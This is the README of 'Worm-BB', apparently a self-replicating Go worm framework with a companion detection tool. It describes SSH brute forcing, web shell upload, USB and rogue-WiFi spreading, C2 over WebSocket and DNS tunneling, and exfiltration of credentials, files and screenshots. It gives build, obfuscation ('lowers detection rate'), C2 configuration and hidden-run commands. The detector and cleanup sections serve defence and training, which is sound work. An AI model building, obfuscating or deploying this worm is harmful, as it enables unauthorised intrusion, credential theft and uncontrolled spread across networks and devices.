wormBB_with_c2
README
Worm-BB: Advanced Self-Replicating Framework for Red & Blue Teams
Educational Purpose Only
Worm-BB is a research-grade, multi-platform worm framework written in Go. It demonstrates modern autonomous propagation techniques, stealth command & control, USB and WiFi-based spreading, web shell persistence, and data exfiltration. The companion detection and removal tool helps blue teams identify and eradicate Worm-BB infections in authorized environments.
This repository is for authorized security testing, research, and defense training only.
Overview
Worm-BB implements the classic worm trinity: Scan → Exploit → Replicate. It spreads across networks, USB drives, and rogue WiFi access points, establishes deep persistence on Windows and Linux, and communicates with a C2 server via WebSockets, DNS tunneling, and HTTP beacons. The detector tool (worm_bb_detector) scans for all known Worm-BB artifacts – processes, files, registry keys, scheduled tasks, cron jobs, systemd services, WMI subscriptions, USB autorun files, and network multicast traffic.
Both components are written entirely in Go, making them cross‑platform, statically linked, and difficult to detect by signature‑based AVs (when compiled with obfuscation).
Capabilities
Worm Framework (worm.go)
| Module | Description |
|---|---|
| SSH Bruteforce | Default credential list (root:root, admin:admin, etc.) + payload deployment. |
| SMB/EternalBlue | Detection of port 445; exploit hooks ready. |
| WebShell | Uploads PHP/ASP/Python shells via PUT, POST, FTP, WebDAV; backdoor deployment. |
| USB Propagation | Monitors removable drives, copies worm, creates autorun.inf (Windows) or udev rules (Linux), hides files. |
| WiFi Evil Portal | Rogue AP with DNS spoofing, captive portal, deauth attack; forces worm download. |
| P2P Coordination | Multicast peer discovery (239.255.42.42:4242), leader election, population management. |
| C2 Channels | WebSocket (WSS), DNS tunneling (A/TXT queries), HTTP/S beacons with random User-Agent. |
| Data Exfiltration | Batched, AES‑encrypted exfil to MySQL or HTTPS endpoint; steals creds, files, screenshots. |
| Persistence | Windows: Run keys, scheduled tasks, WMI, startup folder. Linux: crontab, systemd, SSH keys, udev. |
Detection & Removal Tool (worm_bb_detector.go)
| Scan Type | Detects |
|---|---|
| Processes | Names system-update, SystemUpdate, worm_bb, suspicious cmdline. |
| Filesystem | Known worm paths, temp directories, USB autorun files. |
| Registry (Windows) | Run keys containing SystemUpdate. |
| Scheduled Tasks | SystemUpdateTask, SystemUpdateTask_startup. |
| WMI (Windows) | __EventFilter named SystemUpdateFilter. |
| Cron (Linux) | @reboot /tmp/system-update, */30 * * * * /tmp/system-update. |
| Systemd (Linux) | system-update.service. |
| udev (Linux) | 99-usb-autorun.rules. |
| SSH Keys | authorized_keys containing worm-bb-key. |
| USB Drives | autorun.inf, SystemUpdate.exe, .lnk files. |
| Network | Multicast listener on 239.255.42.42:4242, listening ports 4242–8443. |
| Memory (basic) | Loaded module strings on Windows (tasklist /M). |
Remediation actions are generated for each finding: kill processes, delete files, remove registry keys, clean cron/systemd, purge USB malware, and delete WMI subscriptions. The tool supports interactive (prompt per action) or fully automatic (--auto) mode.
Build Instructions
Prerequisites
- Go 1.16+ (
go version) - Optional dependencies for WiFi module (Linux only):
bash sudo apt install libnl-3-dev libnl-genl-3-dev libpcap-dev hostapd dnsmasq - For cross‑compilation to Windows (optional):
bash sudo apt install gcc-mingw-w64-x86-64
Install Go Dependencies
go mod init worm_bb
go get -u github.com/google/gousb
go get -u github.com/gorilla/websocket
go get -u github.com/miekg/dns
go get -u github.com/go-sql-driver/mysql
go get -u golang.org/x/crypto/ssh
go get -u golang.org/x/sys/windows
go get -u golang.org/x/sys/windows/registry
Compile the Worm (worm.go)
# Linux (x86_64)
CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb worm.go
# Windows (x86_64) – hide console
CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc go build -ldflags="-s -w -H=windowsgui" -o worm_bb.exe worm.go
# macOS (Intel)
CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_mac worm.go
# ARM (Raspberry Pi)
CGO_ENABLED=1 GOOS=linux GOARCH=arm GOARM=7 CC=arm-linux-gnueabihf-gcc go build -ldflags="-s -w" -o worm_bb_arm worm.go
Compile the Detector (worm_bb_detector.go)
# Linux
go build -ldflags="-s -w" -o worm_bb_detector worm_bb_detector.go
# Windows
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_detector.exe worm_bb_detector.go
# macOS
GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -o worm_bb_detector_mac worm_bb_detector.go
Obfuscation (Optional, Lowers Detection Rate)
go install mvdan.cc/garble@latest
garble -literals -tiny -seed=random build -ldflags="-s -w" -o worm_bb_obf worm.go
Usage – Worm Framework
Before you run: Change the C2 constants in worm.go to point to your own infrastructure (WebSocket, DNS domain, exfil endpoint).
const (
C2_WEBSOCKET = "wss://your-c2.com:8443/ws"
C2_DNS_DOMAIN = "your-c2.com"
DATA_EXFIL_SERVER = "https://your-c2.com:8443/upload"
)
Run the Worm
# Linux – background, no output
./worm_bb > /dev/null 2>&1 &
# Windows – hidden (compiled with -H=windowsgui)
worm_bb.exe
# Manual execution with output (for debugging)
./worm_bb
On first run, the worm:
1. Checks for existing instances (mutex, lock file, listening ports).
2. Installs persistence (registry, crontab, systemd, etc.).
3. Joins the P2P multicast group.
4. Begins scanning and propagating.
Behaviour Tuning
The worm automatically selects a propagation strategy based on local population:
- FULL_INSTALL – no other worms → aggressive scanning.
- SUPPLEMENT_PROPAGATION – few worms → fill gaps.
- COORDINATED_SCAN – many worms → leader distributes tasks.
- EXPAND_NETWORK – current network saturated → random /24 scans.
- STEALTH_MODE – high density → one host per 5 minutes.
Cleanup
To remove the worm after testing, either run the detection tool (see next section) or manually delete:
# Linux
pkill -f system-update
rm -f /tmp/system-update /etc/systemd/system/system-update.service
crontab -l | grep -v system-update | crontab -
rm -f /etc/udev/rules.d/99-usb-autorun.rules
# Windows
taskkill /F /IM SystemUpdate.exe
schtasks /delete /tn SystemUpdateTask /f
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /f
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"
Usage – Detection & Removal Tool
The detector scans for all Worm-BB indicators and optionally removes them.
Basic Scan (Interactive)
# Linux (run as root for full coverage)
sudo ./worm_bb_detector
# Windows (run as Administrator)
worm_bb_detector.exe
You will be prompted before each remediation action.
Fully Automatic Scan & Clean
sudo ./worm_bb_detector --auto --network
--auto– automatically executes all remediations without prompting.--network– enables multicast listener test and port scanning.
Save JSON Report
sudo ./worm_bb_detector --output scan_report.json
Example Output
================================================
WORM-BB DETECTION AND REMOVAL TOOL
Version: 1.0
================================================
[*] Scanning for worm processes...
[*] Scanning for worm files...
[!] WORM DETECTED! Severity: HIGH
[!] Found 4 indicators
...
[?] Remediation: KILL_PROCESS
Target: PID 1337
Command: kill -9 1337
Execute? (y/N): y
[+] Success: KILL_PROCESS completed
...
[+] All remediations completed successfully!
Exit Codes
| Code | Meaning |
|---|---|
| 0 | No worm detected |
| 1 | Worm detected and remediated |
Ethical & Legal Disclaimer
This software is provided for educational and authorized security testing only.
Read my wormBB research, walk thru and articles here:
https://ek0mssavi0r.dev
https://medium.com/@ekoms1/the-fascinating-world-of-self-replicating-worms-0e6ad768a001
https://substack.com/@ek0mssavi0r/p-193527720
source code
viewer
// click a file to view source